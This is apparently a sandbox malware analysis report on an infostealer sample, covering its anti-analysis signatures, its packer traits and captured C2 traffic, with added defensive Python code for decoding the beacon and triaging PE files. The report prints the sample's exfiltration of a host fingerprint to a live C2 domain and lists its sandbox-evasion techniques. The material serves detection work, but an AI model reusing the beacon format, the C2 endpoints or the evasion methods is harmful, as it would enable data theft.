
Windows Analysis Report
ZN34wF8WI2.exe

Overview

General Information

Sample name: ZN34wF8WI2.exe (renamed because the original name is a hash value)
Original sample name: e08249e8fc2ed51351908219f021fb0e.exe
Analysis ID: 1582693
MD5: e08249e8fc2ed51351908219f021fb0e
SHA1: c8e88594280d1f80feccc811bed7ce03eda5286b
SHA256: 36203748faebc1b01f1450c5b93bd31d21b9f98d1e5df663f8a5451c4553dc71
Tags: exe, user-abuse_ch

Detection

Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ZN34wF8WI2.exe (PID: 6040 cmdline: "C:\Users\user\Desktop\ZN34wF8WI2.exe" MD5: E08249E8FC2ED51351908219F021FB0E)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: ZN34wF8WI2.exe | Avira: detected
Source: ZN34wF8WI2.exe | ReversingLabs: Detection: 47%
Source: ZN34wF8WI2.exe | Virustotal: Detection: 51%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: ZN34wF8WI2.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0043DCF0 -----BEGIN PUBLIC KEY-----
Source: ZN34wF8WI2.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0047A5B0 mov dword ptr [ebp+04h], 424D53FFh (0x424D53FF written little-endian is the byte sequence FF 53 4D 42, i.e. "\xFFSMB", the SMB1 header signature)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0047A7F0 mov dword ptr [ebx+04h], 424D53FFh (x2); mov dword ptr [edi+04h], 424D53FFh (x2); mov dword ptr [esi+04h], 424D53FFh (x2)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0047B560 mov dword ptr [ebx+04h], 424D53FFh
Source: ZN34wF8WI2.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0041255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, SHGetKnownFolderPath, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_004129FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */* | Content-Type: application/json | Content-Length: 560612 | Data Ascii (decoded from the captured hex prefix; the report truncates the body at this point): { "ip": "8.46.123.189", "current_time": "8598217652914335449", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, ...
Source: global traffic | HTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */*
Source: global traffic | HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (reported 5 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_004DA870 recv
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fortth14vs.top
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Server: nginx/1.22.1 | Date: Tue, 31 Dec 2024 08:44:18 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Server: nginx/1.22.1 | Date: Tue, 31 Dec 2024 08:44:20 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | Data Ascii: (same body as the previous response)
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: http://.css
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: http://.jpg
Source: ZN34wF8WI2.exe, 00000005.00000003.1394903835.0000000001A36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZ
Source: ZN34wF8WI2.exe, 00000005.00000003.1395528056.00000000019C7000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: ZN34wF8WI2.exe, 00000005.00000002.1416710655.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1395528056.00000000019C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1
Source: ZN34wF8WI2.exe, 00000005.00000003.1394939615.00000000019D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ZN34wF8WI2.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: ZN34wF8WI2.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: ZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
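The captured exchange above (an IP-echo GET to httpbin.org, a JSON host fingerprint POSTed to home.fortth14vs.top, a tasking GET with ?argument=0, then a 31-byte acknowledgement) is easier to work with once the hex dump is decoded. The block below is an added example and is not part of the Joe Sandbox report or the sample's own code: it decodes the report's own hex prefix of the fingerprint POST (copied from the dump and cut after the fourth process entry), parses what it can of the truncated body, and derives network IOCs from the four captured requests. Reading the trailing ten digits of the C2 path as a Unix timestamp is this example's assumption, not a statement of the report.

```python
"""Triage of the C2 exchange captured above. Added example, not part of the
Joe Sandbox report: decodes the hex "Data Raw" dump of the fingerprint POST,
recovers the fields even though the body is truncated, and lists the
network IOCs. The hex is constructed from the report's dump, cut after the
fourth process entry; the request list is the report's four requests."""
import json
import re
from datetime import datetime, timezone

# Constructed: prefix of the 560,612-byte POST body, byte for byte as the report prints it.
POST_BODY_HEX = """
7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20
22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 33 33 35 34 34 39 22 2c 20
22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20
22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20
22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20
22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20
22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20
22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20
7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20
7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20
7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20
7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c
"""

SCALAR_KEYS = ("ip", "current_time", "Num_processor", "Num_ram", "Num_displays",
               "resolution_x", "resolution_y", "recent_files")
STR, NUM = r'"(?:[^"\\]|\\.)*"', r'-?\d+(?:\.\d+)?'   # JSON string literal / number


def decode_hex_dump(dump: str) -> str:
    """Turn a sandbox 'Data Raw' hex dump into text (bytes.fromhex skips whitespace)."""
    return bytes.fromhex(dump).decode("utf-8", errors="replace")


def parse_fingerprint(text: str) -> dict:
    """Parse the beacon body. When the body is truncated (as in the report), fall back
    to field-level regexes so the host profile and process list are still recovered."""
    try:
        return {"complete": True, **json.loads(text)}
    except json.JSONDecodeError:
        pass
    out = {"complete": False}
    for key in SCALAR_KEYS:
        m = re.search(rf'"{key}":\s*({STR}|{NUM})', text)
        if m:
            out[key] = json.loads(m.group(1))   # unescapes strings, types numbers
    out["drivers"] = [{"name": json.loads(n), "all": float(a), "free": float(f)} for n, a, f in
                      re.findall(rf'\{{\s*"name":\s*({STR}),\s*"all":\s*({NUM}),\s*"free":\s*({NUM})\s*\}}', text)]
    out["processes"] = [{"name": json.loads(n), "pid": int(p)} for n, p in
                        re.findall(rf'\{{\s*"name":\s*({STR}),\s*"pid":\s*(\d+)\s*\}}', text)]
    return out


# The four requests the report captured, in order (constructed from the traffic lines above).
BEACON = [
    ("GET",  "httpbin.org",         "/ip"),
    ("POST", "home.fortth14vs.top", "/gduZhxVRrNSTmMahdBGb1735537738"),
    ("GET",  "home.fortth14vs.top", "/gduZhxVRrNSTmMahdBGb1735537738?argument=0"),
    ("POST", "home.fortth14vs.top", "/gduZhxVRrNSTmMahdBGb1735537738"),
]


def extract_iocs(beacon) -> dict:
    """Separate the public IP-echo service from the C2 and read the trailing digits of the C2 path."""
    c2 = [(h, p.split("?", 1)[0]) for _, h, p in beacon if h != "httpbin.org"]
    iocs = {"ip_echo": "httpbin.org",
            "c2_hosts": sorted({h for h, _ in c2}),
            "c2_paths": sorted({p for _, p in c2})}
    m = re.search(r"(\d{10})$", iocs["c2_paths"][0]) if iocs["c2_paths"] else None
    if m:   # Assumption of this example, not of the report: ten trailing digits read as a Unix timestamp
        iocs["path_suffix_as_utc"] = datetime.fromtimestamp(int(m.group(1)), timezone.utc).isoformat()
    return iocs


if __name__ == "__main__":
    profile = parse_fingerprint(decode_hex_dump(POST_BODY_HEX))
    print(profile["ip"], profile["Num_processor"], "CPUs,", len(profile["processes"]), "processes parsed")
    print(extract_iocs(BEACON))
```

Run as a script it prints the recovered host profile and the IOC set; given a complete body, parse_fingerprint() returns the whole document with "complete": True instead of taking the regex fallback. The timestamp reading lands on 2024-12-30, the day before the analysis date in the 404 responses, which is why it is worth flagging, but it stays a hypothesis until another sample with a different suffix confirms the pattern.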

System Summary

Source: ZN34wF8WI2.exe | Static PE information: section name: (blank)
Source: ZN34wF8WI2.exe | Static PE information: section name: .idata
Source: ZN34wF8WI2.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_3_01A40738 (reported 4 times)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_3_01A4E5BC
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code functions: 5_2_004205B0, 5_2_00426FA0, 5_2_0044F100, 5_2_004DB180, 5_2_0079E050, 5_2_0079A000, 5_2_004E00E0, 5_2_00476210, 5_2_004DC320, 5_2_004DE3E0, 5_2_00764410, 5_2_004E0420, 5_2_0041E620, 5_2_004DC770, 5_2_00776730, 5_2_0047A7F0, 5_2_00794780, 5_2_00424940, 5_2_0041A960, 5_2_004CC900, 5_2_005E6AC0, 5_2_006CAAC0, 5_2_005A4B60, 5_2_006CAB2C, 5_2_00788BF0, 5_2_0041CBB0, 5_2_0079CC90, 5_2_00794D40, 5_2_005D0D80, 5_2_0078CD80, 5_2_0072AE30, 5_2_00434F70, 5_2_004DEF90, 5_2_004D8F90, 5_2_00762F90, 5_2_004210E6, 5_2_0077D430, 5_2_007835B0, 5_2_007A17A0, 5_2_004C9880, 5_2_00769920, 5_2_00793A70, 5_2_00451BE0, 5_2_00781BD0, 5_2_00777CC0, 5_2_006C9C80, 5_2_00425DB0, 5_2_00423ED0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 004171E0 appears 47 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 0041CAA0 appears 63 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 004F44A0 appears 72 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 00454FD0 appears 264 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 005ECBC0 appears 101 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 004173F0 appears 113 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 0041C960 appears 36 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 004175A0 appears 666 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 005C7220 appears 101 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 00454F40 appears 334 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 0042CCD0 appears 55 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 00455340 appears 50 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 004550A0 appears 100 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: String function: 0042CD40 appears 73 times
Source: ZN34wF8WI2.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: ZN34wF8WI2.exe | Static PE information: Section: aapkfxsh ZLIB complexity 0.9946660368424814
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@9/2
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0041255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, SHGetKnownFolderPath, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_004129FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 4 times)
Source: ZN34wF8WI2.exe | ReversingLabs: Detection: 47%
Source: ZN34wF8WI2.exe | Virustotal: Detection: 51%
Source: ZN34wF8WI2.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: ZN34wF8WI2.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Section loaded (in order): apphelp.dll, winmm.dll, iphlpapi.dll, cryptbase.dll, cryptsp.dll, rsaenh.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, winrnr.dll, uxtheme.dll, windows.storage.dll, wldp.dll, windowscodecs.dll, kernel.appcore.dll (napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll and winrnr.dll were loaded a second time before kernel.appcore.dll)
Source: ZN34wF8WI2.exe | Static file information: File size 4464640 > 1048576
Source: ZN34wF8WI2.exe | Static PE information: Raw size of (blank-named section) is bigger than: 0x100000 < 0x289000
Source: ZN34wF8WI2.exe | Static PE information: Raw size of aapkfxsh is bigger than: 0x100000 < 0x1b5400

Data Obfuscation

Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Unpacked PE file: 5.2.ZN34wF8WI2.exe.410000.0.unpack | section rights after unpacking: (blank):EW; .rsrc:W; .idata:W; (blank):EW; aapkfxsh:EW; ucrzewim:EW; .taggant:EW | vs. on disk: (blank):ER; .rsrc:W; .idata:W; (blank):EW; aapkfxsh:EW; ucrzewim:EW; .taggant:EW (the first blank-named section goes from execute/read on disk to execute/write in memory, which is what the "changes PE section rights" signature keys on)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: ZN34wF8WI2.exe | Static PE information: real checksum: 0x44b7d8 should be: 0x45056d
Source: ZN34wF8WI2.exe | Static PE information: section names: (blank), .idata, (blank), aapkfxsh, ucrzewim, .taggant
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_3_01A3F8B8 push eax; ret (at 5_3_01A3F8B9; reported 4 times)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_3_01A3C248 pushad; ret (at 5_3_01A3C261; reported 4 times)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_007941D0 push eax; mov dword ptr [esp], edx (at 5_2_007941D5)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_00492340 push eax; mov dword ptr [esp], 00000000h (at 5_2_00492343)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_004CC7F0 push eax; mov dword ptr [esp], 00000000h (at 5_2_004CC743)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0046E92D push es; retf (at 5_2_0046E92E)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_00450AC0 push eax; mov dword ptr [esp], 00000000h (at 5_2_00450AC4)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_00471430 push eax; mov dword ptr [esp], 00000000h (at 5_2_00471433)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_004939A0 push eax; mov dword ptr [esp], 00000000h (at 5_2_004939A3)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0046DAD0 push eax; mov dword ptr [esp], edx (at 5_2_0046DAD1)
Source: ZN34wF8WI2.exe | Static PE information: section name: aapkfxsh entropy: 7.956229076953652
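The static traits listed above (two sections with blank or special-character names, random names aapkfxsh and ucrzewim, an entry point in .taggant, every section writable and executable once unpacked, a section entropy of 7.96 with ZLIB complexity 0.99, and a header checksum that does not match) are what a packer leaves behind, and each one can be checked without running the sample. The block below is an added example, not part of the Joe Sandbox report, that implements those checks with the Python standard library. The PE it inspects is a synthetic PE32 built in the block to mimic the report's layout (constructed data, not the sample itself), and the thresholds of 7.2 bits for entropy and 0.95 for compressibility are this example's choices.

```python
"""Static triage for the packer traits the report lists: blank and random
section names, write+execute section rights, an entry point in .taggant,
near-incompressible section data and a wrong header checksum. Added example,
not part of the Joe Sandbox report; standard library only, and the PE it
scans is a tiny synthetic PE32 built inline (constructed, not the sample)."""
import hashlib
import math
import struct
import zlib

SCN_CODE, SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20, 0x20000000, 0x40000000, 0x80000000
STANDARD_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc", ".bss", ".tls", ".pdata"}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; packed or encrypted data sits close to 8.0."""
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c) if n else 0.0


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw size ratio (the report's 'ZLIB complexity'); about 1.0 means incompressible."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def pe_checksum(image: bytes) -> int:
    """Standard PE checksum: fold 16-bit words with carry, skip the CheckSum field, add the file length."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    cs_off = e_lfanew + 4 + 20 + 64      # PE signature + COFF header + CheckSum offset in the optional header
    padded = image + b"\0" * (len(image) % 2)
    total = 0
    for off in range(0, len(padded), 2):
        if off not in (cs_off, cs_off + 2):
            total += struct.unpack_from("<H", padded, off)[0]
            total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(image)


def parse_sections(image: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) read from the section table."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    entry_rva = struct.unpack_from("<I", image, e_lfanew + 24 + 16)[0]
    sections, off = [], e_lfanew + 24 + opt_size
    for _ in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", image, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "chars": chars, "data": image[rawptr:rawptr + rawsize]})
        off += 40
    return entry_rva, sections


def triage(image: bytes) -> dict:
    """Apply the report's static checks: per-section tags plus file-level findings."""
    entry_rva, sections = parse_sections(image)
    result = {"sections": {}, "findings": [], "entry_point_section": None}
    for s in sections:
        tags = []
        if not s["name"].strip() or not s["name"].isprintable():
            tags.append("blank/special name")
        elif s["name"] not in STANDARD_NAMES:
            tags.append("non-standard name")
        if s["chars"] & SCN_EXECUTE and s["chars"] & SCN_WRITE:
            tags.append("writable+executable")
        if entropy(s["data"]) > 7.2:
            tags.append("high entropy")
        if zlib_complexity(s["data"]) > 0.95:
            tags.append("incompressible")
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], len(s["data"])):
            result["entry_point_section"] = s["name"]
            if s["name"] not in STANDARD_NAMES:
                result["findings"].append("entry point outside standard sections")
        result["sections"][s["name"]] = tags
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    stored = struct.unpack_from("<I", image, e_lfanew + 24 + 64)[0]
    result["checksum"] = {"stored": stored, "computed": pe_checksum(image)}
    if stored != result["checksum"]["computed"]:
        result["findings"].append("invalid checksum")
    return result


def build_pe(sections, entry_rva, stored_checksum=0) -> bytes:
    """Minimal PE32 file for testing; sections = [(name, rva, characteristics, data)]."""
    e_lfanew, opt_size, align = 0x40, 224, 0x200
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                  # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, align)  # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 64, stored_checksum)            # CheckSum
    first_raw = -(-(len(dos) + 24 + opt_size + 40 * len(sections)) // align) * align
    table, body = b"", b""
    for name, rva, chars, data in sections:
        raw = data + b"\0" * (-len(data) % align)
        table += struct.pack("<8sIIIIIIHHI", name, len(data), rva, len(raw), first_raw + len(body), 0, 0, 0, 0, chars)
        body += raw
    headers = dos + b"PE\0\0" + coff + bytes(opt) + table
    return headers + b"\0" * (first_raw - len(headers)) + body


# Constructed sample mirroring the report's layout: code and resources, a blank-named RWX section,
# a random-named RWX section of pseudo-random (packed-looking) bytes, and an RWX .taggant
# section that owns the entry point.
PACKED = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))
RWX = SCN_CODE | SCN_EXECUTE | SCN_READ | SCN_WRITE
SECTIONS = [
    (b".text",    0x1000, SCN_CODE | SCN_EXECUTE | SCN_READ, b"\x55\x8b\xec\x90" * 64),
    (b".rsrc",    0x2000, SCN_READ,                          b"\0" * 256),
    (b" ",        0x3000, RWX,                               b"\xc3" * 16),
    (b"aapkfxsh", 0x4000, RWX,                               PACKED),
    (b".taggant", 0x5000, RWX,                               b"\x60\x9c\xe8" + b"\0" * 13),
]
SAMPLE = build_pe(SECTIONS, entry_rva=0x5000)

if __name__ == "__main__":
    verdict = triage(SAMPLE)
    for name, tags in verdict["sections"].items():
        print(repr(name), tags)
    print(verdict["findings"], verdict["checksum"])
```

Point triage() at the bytes of a real file and the same tags come out; on this sample the report's numbers (entropy 7.96, ZLIB complexity 0.99 for aapkfxsh, entry point in .taggant, checksum 0x44b7d8 stored versus 0x45056d computed) are exactly what these four functions measure. The checksum mismatch alone is weak evidence, since the loader only enforces it for drivers and a few system images, which is why it is reported alongside the section findings rather than on its own.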

Boot Survival

